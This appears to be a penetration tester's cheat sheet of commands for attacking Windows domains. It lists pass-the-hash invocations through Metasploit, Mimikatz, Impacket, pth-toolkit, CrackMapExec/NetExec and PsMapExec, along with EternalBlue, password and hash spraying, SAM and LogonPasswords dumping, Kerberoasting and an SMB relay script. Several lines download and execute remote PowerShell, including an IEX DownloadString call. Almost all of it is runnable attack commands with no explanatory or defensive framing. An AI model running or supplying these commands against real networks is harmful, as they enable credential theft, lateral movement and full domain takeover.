MSF
use exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/psexec
set smbpass 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38
MiMi
privilege::debug
sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38
Impacket
#SMB
python smbclient.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-smbclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105/c$
crackmapexec smb 192.168.1.105 -u Administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig
#WMI
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected]
pth-wmic -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 "select Name from Win32_UserAccount"
#win
wget <https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1>; Invoke-WMIExec -Target 192.168.1.105 -Domain ignite -Username Administrator -Hash 32196B56FFE6F45E294117B91A83BF38 -Command "cmd /c mkdir c:\\hacked" -Verbose
wmiexec.exe -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
#RPC
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
pth-rpcclient -U ignite/Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105
pth-net rpc share list -U 'ignite\\Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38' -S 192.168.1.105
#Other
pth-winexe -U Administrator%00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 //192.168.1.105 cmd.exe
pth-curl --ntlm -u Administrator:32196B56FFE6F45E294117B91A83BF38 <http://192.168.1.105/file.txt>
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 [email protected] whoami
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected]
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 ignite/[email protected] query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s
SMB Relay Attack Script
git clone <https://github.com/m4lal0/smbrelay>
cd smbrelay; chmod +x smbrelay.sh
./smbrelay.sh --install
MUT
❌ CrackMapExec - closed
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
//Start
- NetExec
- nxc
- nxcdb
- netexec
#DB
nxcdb help
workspace list
workspace HTB
proto smb
#Usage
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success | grep '[+]'
#Passwords Policy
crackmapexec smb targets.txt -u User -p P@ssw0rd --pass-pol
crackmapexec smb targets.txt -u User -p P@ssw0rd --local-groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --groups
crackmapexec smb targets.txt -u User -p P@ssw0rd --users
✅ PsMapExec (Windows)
IEX(New-Object System.Net.WebClient).DownloadString("<https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1>")
//Start
# Execute WMI commands over all systems in the domain using password authentication
PsMapExec -Targets all -Method WMI -Username Admin -Password Pass -Command whoami
# Execute WinRM commands over all systems in the domain using hash authentication
PsMapExec -Targets all -Method WinRM -Username Admin -Hash [Hash] -Command whoami
# Check RDP Access against workstations in the domain and using local authentication
PsMapExec -Targets Workstations -Method RDP -Username LocalAdmin -Password Pass -LocalAuth
# Dump SAM on a single system using SMB and a -ticket for authentication
PsMapExec -Targets DC01.Security.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Check SMB Signing on all domain systems
PsMapExec -Targets All -Method GenRelayList
# Dump LogonPasswords on all Domain Controllers over WinRM
PsMapExec -Targets DCs -Method WinRM -Username Admin -Password Pass -Module LogonPasswords
# Use WMI to check current user admin access from systems read from a text file
PsMapExec -Targets C:\\temp\\Systems.txt -Method WMI
# Spray passwords across all accounts in the domain
PsMapExec -Method Spray -SprayPassword [Password]
# Spray Hashes across all accounts in the domain that have AdminCount=1
PsMapExec -Targets "AdminCount=1" -Method Spray -SprayHash [Hash]
# Spray Hashes across all Domain Admin group users
PsMapExec -Targets "Domain Admins" -Method Spray -SprayHash [Hash]
# Kerberoast
PsMapExec -Method Kerberoast -ShowOutput
# IPMI
PsMapExec -Targets 192.168.1.0/24 -Method IPMI